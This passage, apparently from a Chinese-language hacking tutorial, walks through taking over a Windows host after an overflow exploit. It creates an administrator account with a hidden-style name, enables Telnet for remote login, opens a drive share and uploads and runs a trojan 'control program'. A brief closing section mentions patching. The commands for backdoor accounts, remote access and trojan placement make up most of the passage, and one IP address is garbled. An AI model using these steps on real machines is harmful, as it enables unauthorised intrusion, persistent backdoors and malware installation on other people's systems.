如果要想给其主机建立个用户，请在下方文本处输入“net user flywcy$(用户名) 123456(密码) /add”的格式命令，这样就可建立自己的用户名称了，不过其权限身份为普通用户，除了可以浏览观看文件，就没有太大的作为了。所以你还需要继续在其文本处，输入net localgroup administrators flywcy$（用户名） /add的格式命令后，单击“Run”按钮，此时就会立即将其普通用户身份，提升为管理员权限。接下来为了使你的控制程序（木马），能够上传并且运行在被溢出的主机内，这里为它开通Telnet服务，还要继续在下方文本处，输入open telnet命令后，单击“Run”按钮，才可开放其主机远程登录服务。

　　操作完毕后，打开系统自带的“CMD命令”窗口，在其光标闪烁的命令行下，输入telnet 168.168.168118（所要登录远程主机的IP地址），敲击“回车键”按钮，就会立即连接上远程被溢出的漏洞主机，然后按照提示信息，输入刚才在远程主机建立的用户名及密码，登录即可。而后开通C盘共享服务，在命令行处输入net share d$(共享名)＝d（盘符路径）字符，敲击“回车”按钮，将其共享开放。顺“原路”返回到系统桌面，在空白处单击“右键”按钮，依次选择“新建”→“快捷方式”选项，在弹出的“创建快捷方式”对话框内，输入//168.168.168.118/d$（被开放共享主机的IP地址及共享盘符）。然后单击“下一步”按钮直到完成结束，就会在桌面出现带有IP地址名称的文件夹。然后打开此文件夹，把控制程序（木马）放置其中，在Telnet里运行即可远程遥控主机（如图5）。


图5

　　三、防范溢出入侵

　　以上从发现漏洞到入侵，其扫描器不仅给攻击者一个漏洞利用参考，而且对于其漏洞的修补，也给了明确的补救方案，这里你可以根据扫描器所提供给你的解决方案，进入微软公司页面来完成漏洞的修补。当然你也可以依靠百度搜索引擎的功能，来寻找能够修补其漏洞的安全补丁。此时如果你还想修补系统内的其他漏洞，只要继续在其百度平台下，输入想要修补漏洞的关键字，即可从中找到修补其漏洞补丁的链接。